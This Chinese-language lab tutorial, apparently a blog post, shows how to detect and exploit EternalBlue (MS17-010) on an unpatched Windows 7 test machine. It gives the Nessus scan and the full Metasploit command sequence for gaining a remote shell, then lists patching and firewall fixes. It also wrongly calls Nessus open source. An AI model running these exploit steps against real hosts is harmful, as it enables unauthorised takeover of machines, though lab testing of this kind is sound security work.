如何發現永恆之藍?
利用漏洞之前,首先是要發現漏洞,那么我們在做測試的時候如何去發現漏洞呢?今天我給大家介紹一款開源免費的掃描工具Nessus。Nessus號稱是世界上最流行的漏洞掃描程序,通常包括成千上萬的最新的漏洞,各種各樣的掃描選項,及易於使用的圖形界面和有效的報告。在這里我們僅需要驗證一台主機是否存在相印的漏洞即可。
下載地址:https://www.tenable.com/downloads/nessus
利用nessus發現永恆之藍漏洞
我在本地提前部署了未裝任何安全殺毒軟件、未進行過補丁升級的靶機作為測試環境。
以下為測試環境:
Win7靶機:192.168.80.101
Kali攻擊機: 192.168.80.100
Nessus:192.168.80.88
下圖為對靶機掃描的部分漏洞(摘取中高危漏洞)
驗證漏洞
驗證漏洞環節就需要我們用到kali攻擊機里面的metaploit工具
root@kali:~# msfconsole \\打開msf
msf5 > search MS17-010 \\搜索
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options \\查看選項
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.80.101 \\設置目標主機地址
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options \\查看選項
msf5 auxiliary(scanner/smb/smb_ms17_010) > run \\執行
=====================以上驗證了目標靶機存在永恆之藍漏洞=======================
msf5 > use exploit/windows/smb/ms17_010_eternalblue \\使用攻擊模塊
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.80.101 \\設置目標靶機地址
msf5 exploit(windows/smb/ms17_010_eternalblue) > run \\執行
成功獲取靶機的shell
C:\Windows\system32>chcp 65001 \\由於亂碼,需要進行設置
獲取到shell之后就可以為所欲為啦,你就是這台機器的主人。
======================以上為漏洞驗證過程================================
如何修復漏洞
1、 及時更新補丁
2、如果沒有使用需求,建議關閉445端口
3、 設置合理的防火牆策略並開啟防火牆
4、 本地安裝安全防護軟件,如360、火絨等
=======================請勿用於非法用途,否則后果自負====================